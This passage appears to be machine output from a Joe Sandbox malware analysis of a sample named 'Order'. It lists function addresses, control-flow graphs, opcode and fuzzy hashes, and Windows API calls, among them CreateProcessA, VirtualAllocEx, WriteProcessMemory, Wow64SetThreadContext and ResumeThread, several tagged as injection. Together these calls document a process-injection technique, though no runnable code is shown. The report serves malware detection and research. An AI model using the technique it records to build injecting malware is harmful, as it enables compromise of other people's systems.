                                                                                                                                    control_flow_graph 866 7ac4928-7ac49bd 869 7ac49bf-7ac49c9 866->869 870 7ac49f6-7ac4a16 866->870 869->870 871 7ac49cb-7ac49cd 869->871 875 7ac4a4f-7ac4a7e 870->875 876 7ac4a18-7ac4a22 870->876 873 7ac49cf-7ac49d9 871->873 874 7ac49f0-7ac49f3 871->874 877 7ac49dd-7ac49ec 873->877 878 7ac49db 873->878 874->870 886 7ac4ab7-7ac4b71 CreateProcessA 875->886 887 7ac4a80-7ac4a8a 875->887 876->875 879 7ac4a24-7ac4a26 876->879 877->877 880 7ac49ee 877->880 878->877 881 7ac4a28-7ac4a32 879->881 882 7ac4a49-7ac4a4c 879->882 880->874 884 7ac4a34 881->884 885 7ac4a36-7ac4a45 881->885 882->875 884->885 885->885 888 7ac4a47 885->888 898 7ac4b7a-7ac4c00 886->898 899 7ac4b73-7ac4b79 886->899 887->886 889 7ac4a8c-7ac4a8e 887->889 888->882 891 7ac4a90-7ac4a9a 889->891 892 7ac4ab1-7ac4ab4 889->892 893 7ac4a9c 891->893 894 7ac4a9e-7ac4aad 891->894 892->886 893->894 894->894 895 7ac4aaf 894->895 895->892 909 7ac4c10-7ac4c14 898->909 910 7ac4c02-7ac4c06 898->910 899->898 912 7ac4c24-7ac4c28 909->912 913 7ac4c16-7ac4c1a 909->913 910->909 911 7ac4c08 910->911 911->909 914 7ac4c38-7ac4c3c 912->914 915 7ac4c2a-7ac4c2e 912->915 913->912 916 7ac4c1c 913->916 918 7ac4c4e-7ac4c55 914->918 919 7ac4c3e-7ac4c44 914->919 915->914 917 7ac4c30 915->917 916->912 917->914 920 7ac4c6c 918->920 921 7ac4c57-7ac4c66 918->921 919->918 923 7ac4c6d 920->923 921->920 923->923
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07AC4B5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: a855677adb800bb6c9af0551e885b12600aff9ce561f108fd516d302741f5ad9
                                                                                                                                    • Instruction ID: eefda34a8481bb106e477694bfcd8d86eb227c9ae06552ff878531ac99410bde
                                                                                                                                    • Opcode Fuzzy Hash: a855677adb800bb6c9af0551e885b12600aff9ce561f108fd516d302741f5ad9
                                                                                                                                    • Instruction Fuzzy Hash: CC9180B1D0025ADFDB20CF68C850BDEBBB2BF48314F1481A9E818A7250DB749985CF95
                                                                                                                                    Function 00C1AE38 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 924 c1ae38-c1ae57 927 c1ae83-c1ae87 924->927 928 c1ae59-c1ae66 call c197c0 924->928 930 c1ae89-c1ae93 927->930 931 c1ae9b-c1aedc 927->931 934 c1ae68 928->934 935 c1ae7c 928->935 930->931 937 c1aee9-c1aef7 931->937 938 c1aede-c1aee6 931->938 981 c1ae6e call c1b0d0 934->981 982 c1ae6e call c1b0e0 934->982 935->927 939 c1aef9-c1aefe 937->939 940 c1af1b-c1af1d 937->940 938->937 942 c1af00-c1af07 call c1a190 939->942 943 c1af09 939->943 945 c1af20-c1af27 940->945 941 c1ae74-c1ae76 941->935 944 c1afb8-c1b078 941->944 947 c1af0b-c1af19 942->947 943->947 976 c1b080-c1b0ab GetModuleHandleW 944->976 977 c1b07a-c1b07d 944->977 948 c1af34-c1af3b 945->948 949 c1af29-c1af31 945->949 947->945 952 c1af48-c1af51 call c1a1a0 948->952 953 c1af3d-c1af45 948->953 949->948 957 c1af53-c1af5b 952->957 958 c1af5e-c1af63 952->958 953->952 957->958 959 c1af81-c1af8e 958->959 960 c1af65-c1af6c 958->960 967 c1afb1-c1afb7 959->967 968 c1af90-c1afae 959->968 960->959 962 c1af6e-c1af7e call c1a1b0 call c1a1c0 960->962 962->959 968->967 978 c1b0b4-c1b0c8 976->978 979 c1b0ad-c1b0b3 976->979 977->976 979->978 981->941 982->941
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00C1B09E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                    • Opcode ID: 7718e8460f7a162574059683453ff16c15c821fe02a85fb2182dd2c3886b7c69
                                                                                                                                    • Instruction ID: 5cdaced8f63c62dc3439f39b655978b0f8fc4cd23d63abe3f51a3e019916e14f
                                                                                                                                    • Opcode Fuzzy Hash: 7718e8460f7a162574059683453ff16c15c821fe02a85fb2182dd2c3886b7c69
                                                                                                                                    • Instruction Fuzzy Hash: 3E8133B0A01B058FD724DF69C4417AABBF1BF89300F10892DE09AD7A50DB75E986CB91
                                                                                                                                    Function 00C144D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1092 c144d4-c159d9 CreateActCtxA 1095 c159e2-c15a3c 1092->1095 1096 c159db-c159e1 1092->1096 1103 c15a4b-c15a4f 1095->1103 1104 c15a3e-c15a41 1095->1104 1096->1095 1105 c15a51-c15a5d 1103->1105 1106 c15a60 1103->1106 1104->1103 1105->1106 1108 c15a61 1106->1108 1108->1108
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00C159C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                    • Opcode ID: ebc3d931ca56c6aa2c48e0766eccfdb3fce079620c09dc0cf9256be60401b9d2
                                                                                                                                    • Instruction ID: 8ff3868de1fd3144863a1f34f9b0d984249509b2d22110a9bdf58534a0e9f282
                                                                                                                                    • Opcode Fuzzy Hash: ebc3d931ca56c6aa2c48e0766eccfdb3fce079620c09dc0cf9256be60401b9d2
                                                                                                                                    • Instruction Fuzzy Hash: 2C41D2B0C00719CBDB24CFA9C984BDEBBF5BF89304F24816AD408AB255DB756985DF90
                                                                                                                                    Function 00C1590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1109 c1590c-c15911 1110 c15919-c159d9 CreateActCtxA 1109->1110 1112 c159e2-c15a3c 1110->1112 1113 c159db-c159e1 1110->1113 1120 c15a4b-c15a4f 1112->1120 1121 c15a3e-c15a41 1112->1121 1113->1112 1122 c15a51-c15a5d 1120->1122 1123 c15a60 1120->1123 1121->1120 1122->1123 1125 c15a61 1123->1125 1125->1125
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00C159C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                    • Opcode ID: 1d1f87c63fe927c4bc50d984d8aa14ea0896609ecf598d732519ca8c6259c249
                                                                                                                                    • Instruction ID: ea7bc658b2525f6f196e8ede6f479bd488a0f2d65e62495d571c6c0279e42905
                                                                                                                                    • Opcode Fuzzy Hash: 1d1f87c63fe927c4bc50d984d8aa14ea0896609ecf598d732519ca8c6259c249
                                                                                                                                    • Instruction Fuzzy Hash: 8041F2B0C00719CBDB24CFA9C9847DDBBF5BF89304F24806AD408AB255DB756986CF90
                                                                                                                                    Function 07AC4698 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AC4730
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 0e5895fb1511b8a512ffbaf219d6dceed93391ac099a5d8411348fa260c9feaf
                                                                                                                                    • Instruction ID: 78734a7974eb6e5450a6820b0153f18024ec639deb66e3080378dac207764b0a
                                                                                                                                    • Opcode Fuzzy Hash: 0e5895fb1511b8a512ffbaf219d6dceed93391ac099a5d8411348fa260c9feaf
                                                                                                                                    • Instruction Fuzzy Hash: 352124B59003599FDB10DFA9C885BEEBBF5FF48320F10842AE958A7250C7789944CFA5
                                                                                                                                    Function 07AC4788 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AC4810
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: bb5a19d1fd4e091efe2365e659885ef334af2fd149cc85c8de191feb547545d6
                                                                                                                                    • Instruction ID: eebe026cee67a6856416e971ad11b94dd7552bd510e5c0c7aeba8d99ab4f3d94
                                                                                                                                    • Opcode Fuzzy Hash: bb5a19d1fd4e091efe2365e659885ef334af2fd149cc85c8de191feb547545d6
                                                                                                                                    • Instruction Fuzzy Hash: 8B2157B1C003999FCB10CFA9C881AEEBFF5FF49320F10842AE558A7241D7789945CBA4
                                                                                                                                    Function 07AC46A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07AC4730
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 4a890b067d3fa50374ba4492fa6bc9c348fcce3bc230684032b4a2d5b07ee54a
                                                                                                                                    • Instruction ID: c7c56a0c3f7e2faaba2cb9cd4eb585e6d9f529065d007aafd011719d8dd2211c
                                                                                                                                    • Opcode Fuzzy Hash: 4a890b067d3fa50374ba4492fa6bc9c348fcce3bc230684032b4a2d5b07ee54a
                                                                                                                                    • Instruction Fuzzy Hash: F52124B19003599FDB10CFA9C885BEEBBF5FF88310F10842AE958A7250C7789944CFA4
                                                                                                                                    Function 07AC4501 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AC4586
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 86abecf2b364fe92223d156904cab1419274622d756f8ebb29307fe411765747
                                                                                                                                    • Instruction ID: cb261bb395513f0cbbe6b56de9ecebcccc30a06fd1d1c60af16b8ebb6f754ede
                                                                                                                                    • Opcode Fuzzy Hash: 86abecf2b364fe92223d156904cab1419274622d756f8ebb29307fe411765747
                                                                                                                                    • Instruction Fuzzy Hash: FF2137B19003499FDB10DFAAC4857EEBFF4EF88324F10842AD559A7241CB789985CFA5
                                                                                                                                    Function 00C1D728 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D7B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                    • Opcode ID: f87919ae2e1a4b6cd877c179a8b843b2db3b93cb8406a1329f40ecee0f08b256
                                                                                                                                    • Instruction ID: 6d787bb0da531ae914dddca389d65ce764347129ca9e9191366b3b48582119b1
                                                                                                                                    • Opcode Fuzzy Hash: f87919ae2e1a4b6cd877c179a8b843b2db3b93cb8406a1329f40ecee0f08b256
                                                                                                                                    • Instruction Fuzzy Hash: 6C2103B59003489FDB10CFAAD584AEEBFF5EB48320F14801AE858A3350C374A940CFA0
                                                                                                                                    Function 07AC4790 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07AC4810
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: f72db4aee84a3f564472bec8d08a73a451e82502ad6971503d4ee4a07d9bf2d9
                                                                                                                                    • Instruction ID: 762e1dc0d0fec53bc9b733f43643376ff85babdcd08287fbef0935da4d4a589a
                                                                                                                                    • Opcode Fuzzy Hash: f72db4aee84a3f564472bec8d08a73a451e82502ad6971503d4ee4a07d9bf2d9
                                                                                                                                    • Instruction Fuzzy Hash: B62125B1C003599FCB10DFAAC880AEEFBF5FF48320F10842AE558A7250C7389944CBA4
                                                                                                                                    Function 07AC4508 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AC4586
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 6de5c52a697ce86964fd8e17152ae47da44d2ef9bfc24da66e725f36c62f3e1d
                                                                                                                                    • Instruction ID: d904775745fca10d82c1832f998489bebe05166985de789f445f0df73877dbc1
                                                                                                                                    • Opcode Fuzzy Hash: 6de5c52a697ce86964fd8e17152ae47da44d2ef9bfc24da66e725f36c62f3e1d
                                                                                                                                    • Instruction Fuzzy Hash: BA2137B19003499FDB10DFAAC4857EEBBF4EB88324F108429D559A7240CB78A945CFA4
                                                                                                                                    Function 00C1D730 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D7B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                    • Opcode ID: e543611e30cbe0c0be6925c0f068c08e4ec17a3eb3bbf9ac553da69e6ed099a2
                                                                                                                                    • Instruction ID: 8d16d68fd7853fba9a3d79885edc241191aa3652438d810e5fb86d711b2f1d43
                                                                                                                                    • Opcode Fuzzy Hash: e543611e30cbe0c0be6925c0f068c08e4ec17a3eb3bbf9ac553da69e6ed099a2
                                                                                                                                    • Instruction Fuzzy Hash: 6021E4B59003489FDB10CF9AD984ADEFBF4EB48310F14801AE958A3350C374A940CFA4
                                                                                                                                    Function 07AC45D8 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AC464E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: b9e052efab25c11b0a5ef0546cae755bc8013ba3340b5ed157e841dfc14367be
                                                                                                                                    • Instruction ID: 820fa2958da520d28028929b59827badb65dbedbdd0ec7ae59e7f08428085204
                                                                                                                                    • Opcode Fuzzy Hash: b9e052efab25c11b0a5ef0546cae755bc8013ba3340b5ed157e841dfc14367be
                                                                                                                                    • Instruction Fuzzy Hash: D621BBB28043889FCF10CFA9C840AEEBFF5EF88310F24841DD4A4A7250C7359540CBA5
                                                                                                                                    Function 07AC4018 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: d4c2f9e7db27f3bfa880a17684a1be4fee36f2a8ded49853a33b52e106ad3009
                                                                                                                                    • Instruction ID: 09f5265fc08f89eea5ad91651a6c4e91c25f73b5da2dc95ab28287a17b15ea05
                                                                                                                                    • Opcode Fuzzy Hash: d4c2f9e7db27f3bfa880a17684a1be4fee36f2a8ded49853a33b52e106ad3009
                                                                                                                                    • Instruction Fuzzy Hash: A811ACB18043898FDB20DFA9C4457DEFFF4EF88314F20845DC458A7241C6389944CB95
                                                                                                                                    Function 07AC45E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07AC464E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 80b7f5451f604237ca5eba80548ab4922dfc571adfec144dd1208974cf0cc3eb
                                                                                                                                    • Instruction ID: 158a81d4049b041ed2d1c86c47620da1d872bdc5d873c606f62ccd44af550c19
                                                                                                                                    • Opcode Fuzzy Hash: 80b7f5451f604237ca5eba80548ab4922dfc571adfec144dd1208974cf0cc3eb
                                                                                                                                    • Instruction Fuzzy Hash: 0A1126B19002499FDB10DFAAC844ADEBFF5EB88324F108419E569A7250C775A544CFA5
                                                                                                                                    Function 07AC4020 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: b1cd2cdf18d4fb439a06f1cd597fb587930fdaa743b7c2018da7304733091196
                                                                                                                                    • Instruction ID: c84a385d575c17f8018f5739803983b9a57479fc36559afe13d1c073bfe80007
                                                                                                                                    • Opcode Fuzzy Hash: b1cd2cdf18d4fb439a06f1cd597fb587930fdaa743b7c2018da7304733091196
                                                                                                                                    • Instruction Fuzzy Hash: 981136B19003498FDB20DFAAC4457DEFFF5EB88324F208429D559A7250CB79A944CFA4
                                                                                                                                    Function 07AC6E9C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AC763D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                    • Opcode ID: 7d76cf9889a7bfdea427f32fb4513b3cff46c3f8d1abc3e4b7cb7cf9bd62fb2d
                                                                                                                                    • Instruction ID: 7965a01d68e26b5048897653abd81294cbd07771d8260451cb2b0c0e0ba398dd
                                                                                                                                    • Opcode Fuzzy Hash: 7d76cf9889a7bfdea427f32fb4513b3cff46c3f8d1abc3e4b7cb7cf9bd62fb2d
                                                                                                                                    • Instruction Fuzzy Hash: 6E1103B5800349DFDB10DF9AC845BDEFBF8EB48324F10845AE568A7200D375A944CFA5
                                                                                                                                    Function 07AC75D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AC763D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                    • Opcode ID: 83dc04b84b0f5952bc1e0f2233caaad17f5d35a332a7311fcde58080f3544924
                                                                                                                                    • Instruction ID: 5970760db98644df7a15d6deea838c9cf78a02b604aa9f4b9d87912da56e97b9
                                                                                                                                    • Opcode Fuzzy Hash: 83dc04b84b0f5952bc1e0f2233caaad17f5d35a332a7311fcde58080f3544924
                                                                                                                                    • Instruction Fuzzy Hash: BB1122B58003489FDB20DF9AD849BDEFBF8FB48324F20841AE558A3610C375A580CFA5
                                                                                                                                    Function 00C1B038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00C1B09E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                    • Opcode ID: 417663a6130c6583aa59c8a4230db91670e1bebb19536c972becb061f0c4f597
                                                                                                                                    • Instruction ID: c36852a3a3beeb0aeecc82caa5691c3304f201d74e4f790a72b3761123c4103d
                                                                                                                                    • Opcode Fuzzy Hash: 417663a6130c6583aa59c8a4230db91670e1bebb19536c972becb061f0c4f597
                                                                                                                                    • Instruction Fuzzy Hash: 9011E3B5C003498FDB10DF9AC444BDEFBF4AB89314F10846AD469A7610D375AA45CFA5
                                                                                                                                    Function 00BBD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                    • Instruction ID: 581fda97e36f07f4380233ff7fc34ab6b863e3771ede564c070671b195d6c1bf
                                                                                                                                    • Opcode Fuzzy Hash: 5618673601aa9cf3fb406f056308fe351ac13b80b346e968690e3031d0101644
                                                                                                                                    • Instruction Fuzzy Hash: D1212871500204DFDB05DF14D9C0B66BFA5FB94314F20C6A9D9094B356D37AE856C6A2
                                                                                                                                    Function 00BCD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 990a1ba393b91218712f7148d4fef7fd2f9ea5782b5a9bddd88db0955236f7c0
                                                                                                                                    • Instruction ID: 02cb5319191c1c038df7259befb28442ade10ab4f91d250430d2502668f0afc4
                                                                                                                                    • Opcode Fuzzy Hash: 990a1ba393b91218712f7148d4fef7fd2f9ea5782b5a9bddd88db0955236f7c0
                                                                                                                                    • Instruction Fuzzy Hash: C721F279604200DFCB14DF18D9D4F26BBA5FB84314F20C5BDD84A4B296C33AD847CA61
                                                                                                                                    Function 00BCD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
